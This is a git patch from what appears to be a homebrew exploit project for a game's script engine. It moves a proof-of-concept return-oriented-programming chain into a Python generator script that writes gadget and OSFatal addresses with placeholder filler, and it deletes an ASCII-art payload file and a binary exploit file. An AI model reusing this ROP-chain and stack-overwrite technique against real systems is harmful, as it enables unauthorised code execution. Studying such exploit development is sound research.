From 4430db9de0426840cb77d30c6d14946df0a95430 Mon Sep 17 00:00:00 2001
From: jam1garner <jam1.mcleod@hotmail.com>
Date: Fri, 18 Jan 2019 16:06:49 -0500
Subject: [PATCH] Move build process to ROP generation

---
 kexploit/Makefile                    |   7 +-
 kexploit/Scripts                     |   2 +-
 kexploit/exploit.mscsb               | Bin 2304 -> 0 bytes
 kexploit/generate_rop.py             |  71 ++++++++++++++++
 kexploit/payload.s                   | 120 ---------------------------
 kexploit/{script_0.s => rop_setup.s} |  37 +--------
 6 files changed, 78 insertions(+), 159 deletions(-)
 delete mode 100644 kexploit/exploit.mscsb
 create mode 100644 kexploit/generate_rop.py
 delete mode 100644 kexploit/payload.s
 rename kexploit/{script_0.s => rop_setup.s} (88%)

diff --git a/kexploit/Makefile b/kexploit/Makefile
index cc257e9..e435e49 100644
--- a/kexploit/Makefile
+++ b/kexploit/Makefile
@@ -1,11 +1,14 @@
 all: exploit.mscsb
 
 clean:
-	rm exploit.mscsb payload.s
+	rm -f exploit.mscsb payload.s main.s
 
-exploit.mscsb: payload.s Scripts script_0.s
+exploit.mscsb: payload.s Scripts main.s
 	python3 ../pymsc/asm.py
 
 payload.s: payload.bin
 	python3 generate_payload.py
 
+main.s: rop_setup.s
+	python3 generate_rop.py
+
diff --git a/kexploit/Scripts b/kexploit/Scripts
index 9dd606d..7500d16 100644
--- a/kexploit/Scripts
+++ b/kexploit/Scripts
@@ -1,3 +1,3 @@
-:script_0.s
+:main.s
 payload.s
 |exploit.mscsb
diff --git a/kexploit/exploit.mscsb b/kexploit/exploit.mscsb
deleted file mode 100644
index 2ed4688e9410ebaa884a16d13564d69898b28be5..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 2304
zcmeI!S8o(o0EXdjcU{)&-qr;h#(=R6#s-_-OfenPJBBg6cQ9=!34Nn4B>yAIMHC4M
zAujV%a?3A3&U@BD$rZN<iCI1GnK{~(Mw&CT^T%)R-~Ii|K;lzUh3#!xs$nl2W+$h<
z*uu}Ogq5^XR*_X~l~|=#+A6a$R=HJSRa#Y6wN+!)T6I>v)nGMRS*yuvwpy%KYl_uo
zwOdoIX;x%)SktW;)=aC@nq_ra-Byn^+nQtbT63*FtKXVu&9?@uL2H4v&{||Iww72+
zt!377YlXGaT4fDctF1NGT5Fv(Y^}F8SR1WP)@Eyqwbj~Yjab{Q9o9~3m$lp4W9_x}
zS^KR6)<Nr#b=W#$jao;oV^(a9S;wst)=BG>b=o>(owd$c=dBCYMeCAv*}7s~wXRv$
ztsB-&>y~xf8n^CPcddKYed~dhvmRQHtjE?9>-V;VH25uTKXJlN{`rOzPvmPmU*?!d
zykP<T$_#7i`-=LSD=I%RF)_}CNO4sHg{y<)zsE(4#VA23(kMd)<)}a<s!)v@)S?dc
zXh0*fXhJhu(26N&Lp!Eo8X|OHI%Z%dIx!1f=td7_V-9*T7k%i*Jj}-c2C)DOu?UN?
z1WU0D%drA0u?j<2jWt+{br{BaY`{ir!e(s2R&2uvwqpl&Vi$H}5B6do_TvB!;t&qw
z2u5)f#}H!-$8iEDaSEq#24`^&=WziSaS4}k1y^wm*Kq?kaSOLGjyt%Ed$^AW2zTQ{
zJi=o<!4LQmPw@=T@d7XL3a@$c=B4z|&+ROl?|1Om{ZHV6B=Z&eE3CX!{=-L}vLqQ&
zI4lZ##UUjjr6K8%vXD$jc}PV_Wk^*>bx2J}ZAe{6eMmz{V@NinDWo~1C8RZ<NM)Nx
zQc>9ALO+k0aFpZozmd5(4s&rFg^?l3MEy}b7Ud=zb;Z$Wl*vWih3`!^7xzTDOf(wD
Zy>V``abFzwNB_OTgm;@E-f=!}{{RrMICB61

diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py
new file mode 100644
index 0000000..b52fc27
--- /dev/null
+++ b/kexploit/generate_rop.py
@@ -0,0 +1,71 @@
+
+# Addresses
+LOAD_R3_ADDR = 0x0C00C650
+OSFATAL_ADDR = 0x01031618
+
+def write32(u32):
+    global script
+    script += f"pushInt. {hex(u32)}\n"
+
+def writePayloadAddress():
+    global script
+    script += "pushVar. globalVar,mscScriptAddress\n"
+
+def writeEnd():
+    global script
+    script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
+
+"""
+Example payload
+
+pushInt. 0xC00C650
+pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
+pushInt. 0xBEEF0001
+pushInt. 0xBEEF0002
+pushInt. 0xBEEF0003
+pushInt. 0xBEEF0004
+pushInt. 0xBEEF0005
+pushInt. 0xBEEF0006
+pushInt. 0xBEEF0007
+pushInt. 0xBEEF0008
+pushInt. 0xBEEF0009
+pushInt. 0xBEEF000A
+pushInt. 0xBEEF000B
+pushInt. 0xBEEF000C
+pushInt. 0xBEEF000D
+pushInt. 0xBEEF000E
+pushInt. 0xBEEF000F
+pushInt. 0xBEEF0010
+pushInt. 0xBEEF0011
+pushInt. 0xBEEF0012
+pushInt. 0xBEEF0013
+pushInt. 0xBEEF0014
+pushInt. 0xBEEF0015
+pushInt. 0xBEEF0016
+pushInt. 0xBEEF0017
+pushInt. 0xBEEF0018
+pushInt. 0xBEEF0019
+pushInt. 0xBEEF001A
+pushInt. 0x01031618 #return address (OSFatal)
+
+"""
+
+def writeOSFatalPayload():
+    write32(LOAD_R3_ADDR)
+    writePayloadAddress()
+    for i in range(0x1A):
+        write32(0xBEEF0000 + i + 1)
+    write32(OSFATAL_ADDR)
+    writeEnd()
+
+
+def main():
+    global script
+    with open('rop_setup.s', 'r') as f:
+        script = f.read()
+    writeOSFatalPayload()
+    with open("main.s", 'w') as f:
+        f.write(script)
+
+if __name__ == "__main__":
+    main()
diff --git a/kexploit/payload.s b/kexploit/payload.s
deleted file mode 100644
index ff6977f..0000000
--- a/kexploit/payload.s
+++ /dev/null
@@ -1,120 +0,0 @@
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x27
-byte 0x5f
-byte 0x20
-byte 0x5c
-byte 0x20
-byte 0xa
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x29
-byte 0x20
-byte 0x7c
-byte 0xa
-byte 0x20
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5f
-byte 0x2e
-byte 0x5f
-byte 0x5f
-byte 0x2f
-byte 0x20
-byte 0x0
diff --git a/kexploit/script_0.s b/kexploit/rop_setup.s
similarity index 88%
rename from kexploit/script_0.s
rename to kexploit/rop_setup.s
index b55ad39..79a1bb2 100644
--- a/kexploit/script_0.s
+++ b/kexploit/rop_setup.s
@@ -758,39 +758,4 @@ pushShort. 0x80
 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position
 pushVar. globalVar,calculatedStackPosition
 
-#Write ROP chain
-pushInt. 0xC00C650
-pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
-pushInt. 0xBEEF0001
-pushInt. 0xBEEF0002
-pushInt. 0xBEEF0003
-pushInt. 0xBEEF0004
-pushInt. 0xBEEF0005
-pushInt. 0xBEEF0006
-pushInt. 0xBEEF0007
-pushInt. 0xBEEF0008
-pushInt. 0xBEEF0009
-pushInt. 0xBEEF000A
-pushInt. 0xBEEF000B
-pushInt. 0xBEEF000C
-pushInt. 0xBEEF000D
-pushInt. 0xBEEF000E
-pushInt. 0xBEEF000F
-pushInt. 0xBEEF0010
-pushInt. 0xBEEF0011
-pushInt. 0xBEEF0012
-pushInt. 0xBEEF0013
-pushInt. 0xBEEF0014
-pushInt. 0xBEEF0015
-pushInt. 0xBEEF0016
-pushInt. 0xBEEF0017
-pushInt. 0xBEEF0018
-pushInt. 0xBEEF0019
-pushInt. 0xBEEF001A
-pushInt. 0x01031618 #return address (OSFatal)
-
-#Execute ROP chain
-exit
-
-#Dunno why but I figured I might as well put it here, should never hit this though
-end
+#Write ROP Chain